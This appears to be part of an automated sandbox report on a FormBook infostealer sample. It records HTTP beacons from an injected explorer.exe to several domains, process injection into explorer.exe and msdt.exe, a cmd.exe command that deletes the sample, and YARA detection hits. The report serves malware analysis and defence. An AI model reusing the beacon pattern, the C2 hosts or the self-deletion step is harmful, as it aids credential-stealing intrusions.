                                            Data Ascii: 3ef<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" href="/favicon.ico"><title>Sueper Soldiers</title><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@mdi/font@latest/css/materialdesignicons.min.css"><link href="/css/chunk-vendors.8accd1c5.css" rel="preload" as="style"><link href="/js/app.90907128.js" rel="preload" as="script"><link href="/js/chunk-vendors.af880927.js" rel="preload" as="script"><link href="/css/chunk-vendors.8accd1c5.css" rel="stylesheet"></head><body><noscript><strong>We're sorry but Sueper Soldiers doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><div id="app"></div><script src="/js/chunk-vendors.af880927.js"></script><script src="/js/app.90907128.js"></script></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.349794103.224.212.21980C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:09:30.601727009 CET7145OUTGET /sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX HTTP/1.1
                                            Host: www.arsels.info
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:30.842940092 CET7146INHTTP/1.1 302 Found
                                            Date: Thu, 25 Nov 2021 14:09:30 GMT
                                            Server: Apache/2.4.25 (Debian)
                                            Set-Cookie: __tad=1637849370.3647175; expires=Sun, 23-Nov-2031 14:09:30 GMT; Max-Age=315360000
                                            Location: http://ww25.arsels.info/sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX&subid1=20211126-0109-303d-a829-871fbc9656f2
                                            Content-Length: 0
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.34981234.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:09:35.941904068 CET7185OUTGET /sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX HTTP/1.1
                                            Host: www.electricatrick.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:36.061017036 CET7187INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:09:36 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6192576c-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.34982134.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:10:15.342689991 CET7206OUTGET /sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX HTTP/1.1
                                            Host: www.vupeliquid.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:10:15.460524082 CET7207INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:10:15 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6192576d-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: HkE0tD0g4NXKJfy.exe PID: 5624 Parent PID: 5256

                                            General

                                            Start time:15:08:07
                                            Start date:25/11/2021
                                            Path:C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
                                            Imagebase:0xc10000
                                            File size:446976 bytes
                                            MD5 hash:FCC2D1CDA8D3989FECA9C5F5F900E164
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Analysis Process: HkE0tD0g4NXKJfy.exe PID: 3336 Parent PID: 5624

                                            General

                                            Start time:15:08:10
                                            Start date:25/11/2021
                                            Path:C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            Imagebase:0xe60000
                                            File size:446976 bytes
                                            MD5 hash:FCC2D1CDA8D3989FECA9C5F5F900E164
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Analysis Process: explorer.exe PID: 3352 Parent PID: 3336

                                            General

                                            Start time:15:08:13
                                            Start date:25/11/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff720ea0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Analysis Process: msdt.exe PID: 5960 Parent PID: 3352

                                            General

                                            Start time:15:08:34
                                            Start date:25/11/2021
                                            Path:C:\Windows\SysWOW64\msdt.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\msdt.exe
                                            Imagebase:0x1b0000
                                            File size:1508352 bytes
                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Analysis Process: cmd.exe PID: 5904 Parent PID: 5960

                                            General

                                            Start time:15:08:39
                                            Start date:25/11/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
                                            Imagebase:0xd80000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: conhost.exe PID: 6108 Parent PID: 5904

                                            General

                                            Start time:15:08:40
                                            Start date:25/11/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7f20f0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >